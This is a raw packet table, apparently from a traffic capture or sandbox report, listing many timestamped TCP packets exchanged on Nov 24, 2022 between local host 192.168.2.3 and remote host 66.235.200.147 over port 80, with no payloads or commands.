Nov 24, 2022 12:19:59.782922029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.782955885 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.782974958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.782994032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783013105 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783034086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783052921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783071995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783091068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783111095 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783114910 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783133984 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783154011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783159971 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783159971 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783174038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783193111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783210993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783226013 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783229113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783248901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783260107 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783268929 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783282995 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783289909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783309937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783318996 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783328056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783348083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783356905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783366919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783385038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783385038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783405066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783422947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783432961 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783447981 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783468008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783487082 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783493996 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783507109 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783526897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783528090 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783546925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783550978 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783567905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783588886 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783606052 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783608913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783629894 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783644915 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783651114 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783672094 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783690929 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783710003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783715010 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783730030 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783749104 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783750057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783770084 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783788919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783796072 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783808947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783828974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783829927 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783849955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783864975 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783870935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783890009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783909082 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783926964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783941984 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.783943892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.783977032 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.784003973 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.791464090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791496038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791521072 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791546106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791569948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791595936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791619062 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791646004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791665077 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.791671038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791696072 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791722059 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791744947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791745901 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.791770935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791783094 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.791795969 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791821003 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.791824102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791848898 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791851997 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.791874886 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791898966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791923046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791943073 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.791949034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.791975021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792000055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792007923 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792026043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792051077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792057991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792077065 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792098999 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792115927 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792123079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792149067 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792154074 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792172909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792196989 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792200089 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792222023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792247057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792253017 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792269945 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792284966 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792294979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792318106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792335987 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792344093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792367935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792391062 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792397022 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792417049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792435884 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792439938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792465925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792490959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792514086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792525053 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792538881 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792563915 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792586088 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792589903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792617083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792642117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792666912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792669058 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792692900 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792701006 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792721987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792745113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792768955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792784929 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792793036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792818069 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792819977 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792840958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792865992 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792871952 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792892933 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792892933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792920113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792943954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792963982 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792970896 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.792996883 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.792996883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793023109 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793046951 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793047905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793071032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793095112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793113947 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793118954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793145895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793148994 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793171883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793195963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793200016 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793220043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793242931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793250084 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793270111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793282986 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793292999 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793317080 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793340921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793344021 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793365002 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793380022 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793387890 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793412924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793437958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793437004 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793463945 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793487072 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793498993 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793514967 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793540955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793560028 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793565989 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793592930 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793592930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793621063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793644905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793648005 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793664932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793689013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793713093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793724060 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793731928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793756962 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793760061 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793777943 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793800116 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793806076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793822050 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793833017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793858051 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793884039 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793900967 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793909073 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793934107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793935061 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.793957949 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793982029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.793984890 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794006109 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794029951 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794048071 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794053078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794078112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794080973 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794102907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794116974 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794126987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794150114 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794173956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794176102 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794198036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794209957 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794223070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794248104 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794271946 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794296026 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794326067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794415951 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794507027 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794567108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794569016 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794594049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794620037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794644117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794647932 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794668913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794692993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794715881 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794734955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794744968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794760942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794763088 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794787884 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794795990 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794812918 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794828892 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794837952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794864893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794895887 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794904947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794929028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794951916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794959068 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.794975996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.794992924 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795001984 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795047998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795069933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795085907 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795094013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795104027 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795119047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795144081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795167923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795182943 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795197010 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795212984 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795222044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795247078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795269966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795285940 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795295000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795316935 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795440912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795465946 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795490980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795514107 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795514107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795537949 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795541048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795572996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795598030 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795613050 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795624971 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795643091 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795650005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795674086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795697927 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795712948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795722008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795743942 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795747995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795773029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795798063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795813084 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795825958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795845985 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795851946 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795876980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795901060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795919895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795923948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795948982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795949936 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795974016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.795990944 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.795999050 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796025038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796049118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796065092 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796072006 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796093941 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796096087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796120882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796145916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796165943 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796171904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796192884 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796196938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796427965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796452999 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796477079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796492100 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796502113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796519995 CET	49708	80	192.168.2.3	66.235.200.147
